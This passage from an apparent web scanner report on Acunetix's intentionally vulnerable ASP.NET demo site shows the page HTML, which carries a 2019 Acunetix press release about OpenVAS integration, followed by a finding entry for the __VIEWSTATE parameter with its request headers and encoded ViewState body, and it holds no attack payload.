hZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA+LSBTdXBwb3J0IGZvciBJUHY2PGJyIC8+ICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8+ICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8+ICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA+VGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E+LjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc+QWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc+PC9wPiAgICAgPHA+Rm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A+ZAIJDw8WBB4EVGV4dAUSUmVhZCB1c2VyIGNvbW1lbnRzHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0wZGQCCw8WAh4Dc3JjZGRkfC/V3VUyYDVyDam3PHmHmEHBfQA=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKZgbWNCQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBGZvvLHX89VirHfgZv59zKO75WKS" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>5/16/2019 12:32:30 PM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> – <strong>May 2019</strong> – Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p> <p>“No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,” said Nicolas Sciberras, CTO.</p> <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p> <p><strong>More Features in the Latest Build</strong></p> <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). This new build also includes:</p> <p>- Support for IPv6<br /> - Improved usage of machine resources<br /> - Added support for Selenium scripts as import files<br /> - Multiple vulnerability checks for SAP<br /> - Unauthorized access detection for Redis and Memcached<br /> - Source code disclosure for Ruby and Python</p> <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p> <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p> <p><strong>Acunetix, the Company</strong></p> <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=0
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 421 bytes.	POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=0 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=0 Content-Length: 6541 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 6,541 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA%2BPHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc%2BICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8%2BbmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A%2BICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A%2BICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A%2BICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA%2BLSBTdXBwb3J0IGZvciBJUHY2PGJyIC8%2BICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8%2BICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8%2BICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA%2BVGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E%2BLjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A%2BICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BVXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZX